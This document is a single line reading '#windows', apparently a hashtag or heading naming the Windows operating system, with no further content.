
#windows